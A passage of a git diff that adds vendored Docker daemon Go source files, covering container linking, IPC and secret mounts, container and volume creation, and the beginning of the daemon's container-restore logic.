+package daemon + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strconv" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/cloudflare/cfssl/log" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/links" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" + "github.com/opencontainers/runc/libcontainer/label" + "github.com/pkg/errors" +) + +func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { + var env []string + children := daemon.children(container) + + bridgeSettings := container.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + if bridgeSettings == nil || bridgeSettings.EndpointSettings == nil { + return nil, nil + } + + for linkAlias, child := range children { + if !child.IsRunning() { + return nil, fmt.Errorf("Cannot link to a non running container: %s AS %s", child.Name, linkAlias) + } + + childBridgeSettings := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + if childBridgeSettings == nil || childBridgeSettings.EndpointSettings == nil { + return nil, fmt.Errorf("container %s not attached to default bridge network", child.ID) + } + + link := links.NewLink( + bridgeSettings.IPAddress, + childBridgeSettings.IPAddress, + linkAlias, + child.Config.Env, + child.Config.ExposedPorts, + ) + + env = append(env, link.ToEnv()...) + } + + return env, nil +} + +func (daemon *Daemon) getIpcContainer(container *container.Container) (*container.Container, error) { + containerID := container.HostConfig.IpcMode.Container() + c, err := daemon.GetContainer(containerID) + if err != nil { + return nil, err + } + if !c.IsRunning() { + return nil, fmt.Errorf("cannot join IPC of a non running container: %s", containerID) + } + if c.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return c, nil +} + +func (daemon *Daemon) getPidContainer(container *container.Container) (*container.Container, error) { + containerID := container.HostConfig.PidMode.Container() + c, err := daemon.GetContainer(containerID) + if err != nil { + return nil, err + } + if !c.IsRunning() { + return nil, fmt.Errorf("cannot join PID of a non running container: %s", containerID) + } + if c.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return c, nil +} + +func (daemon *Daemon) setupIpcDirs(c *container.Container) error { + var err error + + c.ShmPath, err = c.ShmResourcePath() + if err != nil { + return err + } + + if c.HostConfig.IpcMode.IsContainer() { + ic, err := daemon.getIpcContainer(c) + if err != nil { + return err + } + c.ShmPath = ic.ShmPath + } else if c.HostConfig.IpcMode.IsHost() { + if _, err := os.Stat("/dev/shm"); err != nil { + return fmt.Errorf("/dev/shm is not mounted, but must be for --ipc=host") + } + c.ShmPath = "/dev/shm" + } else { + rootUID, rootGID := daemon.GetRemappedUIDGID() + if !c.HasMountFor("/dev/shm") { + shmPath, err := c.ShmResourcePath() + if err != nil { + return err + } + + if err := idtools.MkdirAllAs(shmPath, 0700, rootUID, rootGID); err != nil { + return err + } + + shmSize := container.DefaultSHMSize + if c.HostConfig.ShmSize != 0 { + shmSize = c.HostConfig.ShmSize + } + shmproperty := "mode=1777,size=" + strconv.FormatInt(shmSize, 10) + if err := syscall.Mount("shm", shmPath, "tmpfs", uintptr(syscall.MS_NOEXEC|syscall.MS_NOSUID|syscall.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil { + return fmt.Errorf("mounting shm tmpfs: %s", err) + } + if err := os.Chown(shmPath, rootUID, rootGID); err != nil { + return err + } + } + + } + + return nil +} + +func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { + if len(c.SecretReferences) == 0 { + return nil + } + + localMountPath := c.SecretMountPath() + logrus.Debugf("secrets: setting up secret dir: %s", localMountPath) + + defer func() { + if setupErr != nil { + // cleanup + _ = detachMounted(localMountPath) + + if err := os.RemoveAll(localMountPath); err != nil { + log.Errorf("error cleaning up secret mount: %s", err) + } + } + }() + + // retrieve possible remapped range start for root UID, GID + rootUID, rootGID := daemon.GetRemappedUIDGID() + // create tmpfs + if err := idtools.MkdirAllAs(localMountPath, 0700, rootUID, rootGID); err != nil { + return errors.Wrap(err, "error creating secret local mount path") + } + tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootUID, rootGID) + if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to setup secret mount") + } + + for _, s := range c.SecretReferences { + if c.SecretStore == nil { + return fmt.Errorf("secret store is not initialized") + } + + // TODO (ehazlett): use type switch when more are supported + if s.File == nil { + return fmt.Errorf("secret target type is not a file target") + } + + targetPath := filepath.Clean(s.File.Name) + // ensure that the target is a filename only; no paths allowed + if targetPath != filepath.Base(targetPath) { + return fmt.Errorf("error creating secret: secret must not be a path") + } + + fPath := filepath.Join(localMountPath, targetPath) + if err := idtools.MkdirAllAs(filepath.Dir(fPath), 0700, rootUID, rootGID); err != nil { + return errors.Wrap(err, "error creating secret mount path") + } + + logrus.WithFields(logrus.Fields{ + "name": s.File.Name, + "path": fPath, + }).Debug("injecting secret") + secret := c.SecretStore.Get(s.SecretID) + if secret == nil { + return fmt.Errorf("unable to get secret from secret store") + } + if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil { + return errors.Wrap(err, "error injecting secret") + } + + uid, err := strconv.Atoi(s.File.UID) + if err != nil { + return err + } + gid, err := strconv.Atoi(s.File.GID) + if err != nil { + return err + } + + if err := os.Chown(fPath, rootUID+uid, rootGID+gid); err != nil { + return errors.Wrap(err, "error setting ownership for secret") + } + } + + // remount secrets ro + if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to remount secret dir as readonly") + } + + return nil +} + +func killProcessDirectly(container *container.Container) error { + if _, err := container.WaitStop(10 * time.Second); err != nil { + // Ensure that we don't kill ourselves + if pid := container.GetPID(); pid != 0 { + logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(container.ID)) + if err := syscall.Kill(pid, 9); err != nil { + if err != syscall.ESRCH { + return err + } + e := errNoSuchProcess{pid, 9} + logrus.Debug(e) + return e + } + } + } + return nil +} + +func detachMounted(path string) error { + return syscall.Unmount(path, syscall.MNT_DETACH) +} + +func isLinkable(child *container.Container) bool { + // A container is linkable only if it belongs to the default network + _, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + return ok +} + +func enableIPOnPredefinedNetwork() bool { + return false +} + +func (daemon *Daemon) isNetworkHotPluggable() bool { + return true +} + +func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { + var err error + + container.HostsPath, err = container.GetRootResourcePath("hosts") + if err != nil { + return err + } + *sboxOptions = append(*sboxOptions, libnetwork.OptionHostsPath(container.HostsPath)) + + container.ResolvConfPath, err = container.GetRootResourcePath("resolv.conf") + if err != nil { + return err + } + *sboxOptions = append(*sboxOptions, libnetwork.OptionResolvConfPath(container.ResolvConfPath)) + return nil +} + +func initializeNetworkingPaths(container *container.Container, nc *container.Container) { + container.HostnamePath = nc.HostnamePath + container.HostsPath = nc.HostsPath + container.ResolvConfPath = nc.ResolvConfPath +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_windows.go b/vendor/github.com/docker/docker/daemon/container_operations_windows.go new file mode 100644 index 0000000000..d05f251e05 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations_windows.go @@ -0,0 +1,59 @@ +// +build windows + +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/libnetwork" +) + +func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { + return nil, nil +} + +// getSize returns real size & virtual size +func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { + // TODO Windows + return 0, 0 +} + +func (daemon *Daemon) setupIpcDirs(container *container.Container) error { + return nil +} + +// TODO Windows: Fix Post-TP5. This is a hack to allow docker cp to work +// against containers which have volumes. You will still be able to cp +// to somewhere on the container drive, but not to any mounted volumes +// inside the container. Without this fix, docker cp is broken to any +// container which has a volume, regardless of where the file is inside the +// container. +func (daemon *Daemon) mountVolumes(container *container.Container) error { + return nil +} + +func detachMounted(path string) error { + return nil +} + +func killProcessDirectly(container *container.Container) error { + return nil +} + +func isLinkable(child *container.Container) bool { + return false +} + +func enableIPOnPredefinedNetwork() bool { + return true +} + +func (daemon *Daemon) isNetworkHotPluggable() bool { + return false +} + +func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { + return nil +} + +func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +} diff --git a/vendor/github.com/docker/docker/daemon/create.go b/vendor/github.com/docker/docker/daemon/create.go new file mode 100644 index 0000000000..c71d14e5fc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create.go @@ -0,0 +1,290 @@ +package daemon + +import ( + "fmt" + "net" + "runtime" + "strings" + "time" + + "github.com/pkg/errors" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + volumestore "github.com/docker/docker/volume/store" + "github.com/opencontainers/runc/libcontainer/label" +) + +// CreateManagedContainer creates a container that is managed by a Service +func (daemon *Daemon) CreateManagedContainer(params types.ContainerCreateConfig) (containertypes.ContainerCreateCreatedBody, error) { + return daemon.containerCreate(params, true) +} + +// ContainerCreate creates a regular container +func (daemon *Daemon) ContainerCreate(params types.ContainerCreateConfig) (containertypes.ContainerCreateCreatedBody, error) { + return daemon.containerCreate(params, false) +} + +func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, managed bool) (containertypes.ContainerCreateCreatedBody, error) { + start := time.Now() + if params.Config == nil { + return containertypes.ContainerCreateCreatedBody{}, fmt.Errorf("Config cannot be empty in order to create a container") + } + + warnings, err := daemon.verifyContainerSettings(params.HostConfig, params.Config, false) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + } + + err = daemon.verifyNetworkingConfig(params.NetworkingConfig) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + } + + if params.HostConfig == nil { + params.HostConfig = &containertypes.HostConfig{} + } + err = daemon.adaptContainerSettings(params.HostConfig, params.AdjustCPUShares) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + } + + container, err := daemon.create(params, managed) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, daemon.imageNotExistToErrcode(err) + } + containerActions.WithValues("create").UpdateSince(start) + + return containertypes.ContainerCreateCreatedBody{ID: container.ID, Warnings: warnings}, nil +} + +// Create creates a new container from the given configuration with a given name. +func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) (retC *container.Container, retErr error) { + var ( + container *container.Container + img *image.Image + imgID image.ID + err error + ) + + if params.Config.Image != "" { + img, err = daemon.GetImage(params.Config.Image) + if err != nil { + return nil, err + } + + if runtime.GOOS == "solaris" && img.OS != "solaris " { + return nil, errors.New("Platform on which parent image was created is not Solaris") + } + imgID = img.ID() + } + + if err := daemon.mergeAndVerifyConfig(params.Config, img); err != nil { + return nil, err + } + + if err := daemon.mergeAndVerifyLogConfig(¶ms.HostConfig.LogConfig); err != nil { + return nil, err + } + + if container, err = daemon.newContainer(params.Name, params.Config, params.HostConfig, imgID, managed); err != nil { + return nil, err + } + defer func() { + if retErr != nil { + if err := daemon.cleanupContainer(container, true, true); err != nil { + logrus.Errorf("failed to cleanup container on create error: %v", err) + } + } + }() + + if err := daemon.setSecurityOptions(container, params.HostConfig); err != nil { + return nil, err + } + + container.HostConfig.StorageOpt = params.HostConfig.StorageOpt + + // Set RWLayer for container after mount labels have been set + if err := daemon.setRWLayer(container); err != nil { + return nil, err + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAs(container.Root, 0700, rootUID, rootGID); err != nil { + return nil, err + } + if err := idtools.MkdirAs(container.CheckpointDir(), 0700, rootUID, rootGID); err != nil { + return nil, err + } + + if err := daemon.setHostConfig(container, params.HostConfig); err != nil { + return nil, err + } + + if err := daemon.createContainerPlatformSpecificSettings(container, params.Config, params.HostConfig); err != nil { + return nil, err + } + + var endpointsConfigs map[string]*networktypes.EndpointSettings + if params.NetworkingConfig != nil { + endpointsConfigs = params.NetworkingConfig.EndpointsConfig + } + // Make sure NetworkMode has an acceptable value. We do this to ensure + // backwards API compatibility. + container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) + + daemon.updateContainerNetworkSettings(container, endpointsConfigs) + + if err := container.ToDisk(); err != nil { + logrus.Errorf("Error saving new container to disk: %v", err) + return nil, err + } + if err := daemon.Register(container); err != nil { + return nil, err + } + daemon.LogContainerEvent(container, "create") + return container, nil +} + +func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMode containertypes.PidMode, privileged bool) ([]string, error) { + if ipcMode.IsHost() || pidMode.IsHost() || privileged { + return label.DisableSecOpt(), nil + } + + var ipcLabel []string + var pidLabel []string + ipcContainer := ipcMode.Container() + pidContainer := pidMode.Container() + if ipcContainer != "" { + c, err := daemon.GetContainer(ipcContainer) + if err != nil { + return nil, err + } + ipcLabel = label.DupSecOpt(c.ProcessLabel) + if pidContainer == "" { + return ipcLabel, err + } + } + if pidContainer != "" { + c, err := daemon.GetContainer(pidContainer) + if err != nil { + return nil, err + } + + pidLabel = label.DupSecOpt(c.ProcessLabel) + if ipcContainer == "" { + return pidLabel, err + } + } + + if pidLabel != nil && ipcLabel != nil { + for i := 0; i < len(pidLabel); i++ { + if pidLabel[i] != ipcLabel[i] { + return nil, fmt.Errorf("--ipc and --pid containers SELinux labels aren't the same") + } + } + return pidLabel, nil + } + return nil, nil +} + +func (daemon *Daemon) setRWLayer(container *container.Container) error { + var layerID layer.ChainID + if container.ImageID != "" { + img, err := daemon.imageStore.Get(container.ImageID) + if err != nil { + return err + } + layerID = img.RootFS.ChainID() + } + + rwLayer, err := daemon.layerStore.CreateRWLayer(container.ID, layerID, container.MountLabel, daemon.getLayerInit(), container.HostConfig.StorageOpt) + + if err != nil { + return err + } + container.RWLayer = rwLayer + + return nil +} + +// VolumeCreate creates a volume with the specified name, driver, and opts +// This is called directly from the Engine API +func (daemon *Daemon) VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) { + if name == "" { + name = stringid.GenerateNonCryptoID() + } + + v, err := daemon.volumes.Create(name, driverName, opts, labels) + if err != nil { + if volumestore.IsNameConflict(err) { + return nil, fmt.Errorf("A volume named %s already exists. Choose a different volume name.", name) + } + return nil, err + } + + daemon.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()}) + apiV := volumeToAPIType(v) + apiV.Mountpoint = v.Path() + return apiV, nil +} + +func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *image.Image) error { + if img != nil && img.Config != nil { + if err := merge(config, img.Config); err != nil { + return err + } + } + // Reset the Entrypoint if it is [""] + if len(config.Entrypoint) == 1 && config.Entrypoint[0] == "" { + config.Entrypoint = nil + } + if len(config.Entrypoint) == 0 && len(config.Cmd) == 0 { + return fmt.Errorf("No command specified") + } + return nil +} + +// Checks if the client set configurations for more than one network while creating a container +// Also checks if the IPAMConfig is valid +func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error { + if nwConfig == nil || len(nwConfig.EndpointsConfig) == 0 { + return nil + } + if len(nwConfig.EndpointsConfig) == 1 { + for _, v := range nwConfig.EndpointsConfig { + if v != nil && v.IPAMConfig != nil { + if v.IPAMConfig.IPv4Address != "" && net.ParseIP(v.IPAMConfig.IPv4Address).To4() == nil { + return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address)) + } + if v.IPAMConfig.IPv6Address != "" { + n := net.ParseIP(v.IPAMConfig.IPv6Address) + // if the address is an invalid network address (ParseIP == nil) or if it is + // an IPv4 address (To4() != nil), then it is an invalid IPv6 address + if n == nil || n.To4() != nil { + return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address)) + } + } + } + } + return nil + } + l := make([]string, 0, len(nwConfig.EndpointsConfig)) + for k := range nwConfig.EndpointsConfig { + l = append(l, k) + } + err := fmt.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", ")) + return apierrors.NewBadRequestError(err) +} diff --git a/vendor/github.com/docker/docker/daemon/create_unix.go b/vendor/github.com/docker/docker/daemon/create_unix.go new file mode 100644 index 0000000000..2fe5c98a79 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create_unix.go @@ -0,0 +1,81 @@ +// +build !windows + +package daemon + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/runc/libcontainer/label" +) + +// createContainerPlatformSpecificSettings performs platform specific container create functionality +func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { + if err := daemon.Mount(container); err != nil { + return err + } + defer daemon.Unmount(container) + + rootUID, rootGID := daemon.GetRemappedUIDGID() + if err := container.SetupWorkingDirectory(rootUID, rootGID); err != nil { + return err + } + + for spec := range config.Volumes { + name := stringid.GenerateNonCryptoID() + destination := filepath.Clean(spec) + + // Skip volumes for which we already have something mounted on that + // destination because of a --volume-from. + if container.IsDestinationMounted(destination) { + continue + } + path, err := container.GetResourcePath(destination) + if err != nil { + return err + } + + stat, err := os.Stat(path) + if err == nil && !stat.IsDir() { + return fmt.Errorf("cannot mount volume over existing file, file exists %s", path) + } + + v, err := daemon.volumes.CreateWithRef(name, hostConfig.VolumeDriver, container.ID, nil, nil) + if err != nil { + return err + } + + if err := label.Relabel(v.Path(), container.MountLabel, true); err != nil { + return err + } + + container.AddMountPointWithVolume(destination, v, true) + } + return daemon.populateVolumes(container) +} + +// populateVolumes copies data from the container's rootfs into the volume for non-binds. +// this is only called when the container is created. +func (daemon *Daemon) populateVolumes(c *container.Container) error { + for _, mnt := range c.MountPoints { + if mnt.Volume == nil { + continue + } + + if mnt.Type != mounttypes.TypeVolume || !mnt.CopyData { + continue + } + + logrus.Debugf("copying image data from %s:%s, to %s", c.ID, mnt.Destination, mnt.Name) + if err := c.CopyImagePathContent(mnt.Volume, mnt.Destination); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/create_windows.go b/vendor/github.com/docker/docker/daemon/create_windows.go new file mode 100644 index 0000000000..bbf0dbe7b9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create_windows.go @@ -0,0 +1,80 @@ +package daemon + +import ( + "fmt" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" +) + +// createContainerPlatformSpecificSettings performs platform specific container create functionality +func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { + // Make sure the host config has the default daemon isolation if not specified by caller. + if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) { + hostConfig.Isolation = daemon.defaultIsolation + } + + for spec := range config.Volumes { + + mp, err := volume.ParseMountRaw(spec, hostConfig.VolumeDriver) + if err != nil { + return fmt.Errorf("Unrecognised volume spec: %v", err) + } + + // If the mountpoint doesn't have a name, generate one. + if len(mp.Name) == 0 { + mp.Name = stringid.GenerateNonCryptoID() + } + + // Skip volumes for which we already have something mounted on that + // destination because of a --volume-from. + if container.IsDestinationMounted(mp.Destination) { + continue + } + + volumeDriver := hostConfig.VolumeDriver + + // Create the volume in the volume driver. If it doesn't exist, + // a new one will be created. + v, err := daemon.volumes.CreateWithRef(mp.Name, volumeDriver, container.ID, nil, nil) + if err != nil { + return err + } + + // FIXME Windows: This code block is present in the Linux version and + // allows the contents to be copied to the container FS prior to it + // being started. However, the function utilizes the FollowSymLinkInScope + // path which does not cope with Windows volume-style file paths. There + // is a separate effort to resolve this (@swernli), so this processing + // is deferred for now. A case where this would be useful is when + // a dockerfile includes a VOLUME statement, but something is created + // in that directory during the dockerfile processing. What this means + // on Windows for TP5 is that in that scenario, the contents will not + // copied, but that's (somewhat) OK as HCS will bomb out soon after + // at it doesn't support mapped directories which have contents in the + // destination path anyway. + // + // Example for repro later: + // FROM windowsservercore + // RUN mkdir c:\myvol + // RUN copy c:\windows\system32\ntdll.dll c:\myvol + // VOLUME "c:\myvol" + // + // Then + // docker build -t vol . + // docker run -it --rm vol cmd <-- This is where HCS will error out. + // + // // never attempt to copy existing content in a container FS to a shared volume + // if v.DriverName() == volume.DefaultDriverName { + // if err := container.CopyImagePathContent(v, mp.Destination); err != nil { + // return err + // } + // } + + // Add it to container.MountPoints + container.AddMountPointWithVolume(mp.Destination, v, mp.RW) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon.go b/vendor/github.com/docker/docker/daemon/daemon.go new file mode 100644 index 0000000000..55a66aec92 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon.go @@ -0,0 +1,1321 @@ +// Package daemon exposes the functions that occur on the host server +// that the Docker daemon is running. +// +// In implementing the various functions of the daemon, there is often +// a method-specific struct for configuring the runtime behavior. +package daemon + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net" + "os" + "path" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/events" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/daemon/initlayer" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/plugin" + "github.com/docker/libnetwork/cluster" + // register graph drivers + _ "github.com/docker/docker/daemon/graphdriver/register" + dmetadata "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/migrate/v1" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/truncindex" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/docker/runconfig" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/store" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libtrust" + "github.com/pkg/errors" +) + +var ( + // DefaultRuntimeBinary is the default runtime to be used by + // containerd if none is specified + DefaultRuntimeBinary = "docker-runc" + + // DefaultInitBinary is the name of the default init binary + DefaultInitBinary = "docker-init" + + errSystemNotSupported = fmt.Errorf("The Docker daemon is not supported on this platform.") +) + +// Daemon holds information about the Docker daemon. +type Daemon struct { + ID string + repository string + containers container.Store + execCommands *exec.Store + referenceStore reference.Store + downloadManager *xfer.LayerDownloadManager + uploadManager *xfer.LayerUploadManager + distributionMetadataStore dmetadata.Store + trustKey libtrust.PrivateKey + idIndex *truncindex.TruncIndex + configStore *Config + statsCollector *statsCollector + defaultLogConfig containertypes.LogConfig + RegistryService registry.Service + EventsService *events.Events + netController libnetwork.NetworkController + volumes *store.VolumeStore + discoveryWatcher discoveryReloader + root string + seccompEnabled bool + shutdown bool + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + layerStore layer.Store + imageStore image.Store + PluginStore *plugin.Store // todo: remove + pluginManager *plugin.Manager + nameIndex *registrar.Registrar + linkIndex *linkIndex + containerd libcontainerd.Client + containerdRemote libcontainerd.Remote + defaultIsolation containertypes.Isolation // Default isolation mode on Windows + clusterProvider cluster.Provider + cluster Cluster + + seccompProfile []byte + seccompProfilePath string +} + +// HasExperimental returns whether the experimental features of the daemon are enabled or not +func (daemon *Daemon) HasExperimental() bool { + if daemon.configStore != nil && daemon.configStore.Experimental { + return true + } + return false +} + +func (daemon *Daemon) restore() error { + var ( + currentDriver = daemon.GraphDriverName() + containers = make(map[string]*container.Container) + ) + + logrus.Info("Loading containers: start.") + + dir, err := ioutil.ReadDir(daemon.repository) + if err != nil { + return err + } + + for _, v := range dir { + id := v.Name() + container, err := daemon.load(id) + if err != nil { + logrus.Errorf("Failed to load container %v: %v", id, err) + continue + } + + // Ignore the container if it does not support the current driver being used by the graph + if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver { + rwlayer, err := daemon.layerStore.GetRWLayer(container.ID) + if err != nil { + logrus.Errorf("Failed to load container mount %v: %v", id, err) + continue + } + container.RWLayer = rwlayer + logrus.Debugf("Loaded container %v", container.ID) + + containers[container.ID] = container + } else { + logrus.Debugf("Cannot load container %s because it was created with another graph driver.", container.ID) + } + } + + removeContainers := make(map[string]*container.Container) + restartContainers := make(map[*container.Container]chan struct{}) + activeSandboxes := make(map[string]interface{}) + for id, c := range containers { + if err := daemon.registerName(c); err != nil { + logrus.Errorf("Failed to register container %s: %s", c.ID, err) + delete(containers, id) + continue + } + if err := daemon.Register(c); err != nil { + logrus.Errorf("Failed to register container %s: %s", c.ID, err) + delete(containers, id) + continue + } + + // verify that all volumes valid and have been migrated from the pre-1.7 layout + if err := daemon.verifyVolumesInfo(c); err != nil { + // don't skip the container due to error + logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err) + } + + // The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver. + // We should rewrite it to use the daemon defaults. + // Fixes https://github.com/docker/docker/issues/22536 + if c.HostConfig.LogConfig.Type == "" { + if err := daemon.mergeAndVerifyLogConfig(&c.HostConfig.LogConfig); err != nil { + logrus.Errorf("Failed to verify log config for container %s: %q", c.ID, err) + continue + } + } + } + + var migrateLegacyLinks bool // Not relevant on Windows + var wg sync.WaitGroup + var mapLock sync.Mutex + for _, c := range containers { + wg.Add(1) + go func(c *container.Container) { + defer wg.Done() + if err := backportMountSpec(c); err != nil { + logrus.Error("Failed to migrate old mounts to use new spec format") + } + + if c.IsRunning() || c.IsPaused() { + c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking + if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil { + logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err) + return + } + + // we call Mount and then Unmount to get BaseFs of the container + if err := daemon.Mount(c); err != nil { + // The mount is unlikely to fail. However, in case mount fails + // the container should be allowed to restore here. Some functionalities + // (like docker exec -u user) might be missing but container is able to be + // stopped/restarted/removed. + // See #29365 for related information. + // The error is only logged here. + logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err) + } else { + // if mount success, then unmount it + if err := daemon.Unmount(c); err != nil { + logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err) + } + } + + c.ResetRestartManager(false) + if !c.HostConfig.NetworkMode.IsContainer() && c.IsRunning() { + options, err := daemon.buildSandboxOptions(c) + if err != nil { + logrus.Warnf("Failed build sandbox option to restore container %s: %v", c.ID, err) + } + mapLock.Lock() + activeSandboxes[c.NetworkSettings.SandboxID] = options + mapLock.Unlock() + } + + } + // fixme: only if not running + // get list of containers we need to restart + if !c.IsRunning() && !c.IsPaused() { + // Do not autostart containers which + // has endpoints in a swarm scope + // network yet since the cluster is + // not initialized yet. We will start + // it after the cluster is + // initialized. + if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint { + mapLock.Lock() + restartContainers[c] = make(chan struct{}) + mapLock.Unlock() + } else if c.HostConfig != nil && c.HostConfig.AutoRemove { + mapLock.Lock() + removeContainers[c.ID] = c + mapLock.Unlock() + } + } + + if c.RemovalInProgress { + // We probably crashed in the middle of a removal, reset + // the flag. + // + // We DO NOT remove the container here as we do not + // know if the user had requested for either the + // associated volumes, network links or both to also + // be removed. So we put the container in the "dead" + // state and leave further processing up to them. + logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID) + c.ResetRemovalInProgress() + c.SetDead() + c.ToDisk() + } + + // if c.hostConfig.Links is nil (not just empty), then it is using the old sqlite links and needs to be migrated + if c.HostConfig != nil && c.HostConfig.Links == nil { + migrateLegacyLinks = true + } + }(c) + } + wg.Wait() + daemon.netController, err = daemon.initNetworkController(daemon.configStore, activeSandboxes) + if err != nil { + return fmt.Errorf("Error initializing network controller: %v", err) + } + + // Perform migration of legacy sqlite links (no-op on Windows) + if migrateLegacyLinks { + if err := daemon.sqliteMigration(containers); err != nil { + return err + } + } + + // Now that all the containers are registered, register the links + for _, c := range containers { + if err := daemon.registerLinks(c, c.HostConfig); err != nil { + logrus.Errorf("failed to register link for container %s: %v", c.ID, err) + } + } + + group := sync.WaitGroup{} + for c, notifier := range restartContainers { + group.Add(1) + + go func(c *container.Container, chNotify chan struct{}) { + defer group.Done() + + logrus.Debugf("Starting container %s", c.ID) + + // ignore errors here as this is a best effort to wait for children to be + // running before we try to start the container + children := daemon.children(c) + timeout := time.After(5 * time.Second) + for _, child := range children { + if notifier, exists := restartContainers[child]; exists { + select { + case <-notifier: + case <-timeout: + } + } + } + + // Make sure networks are available before starting + 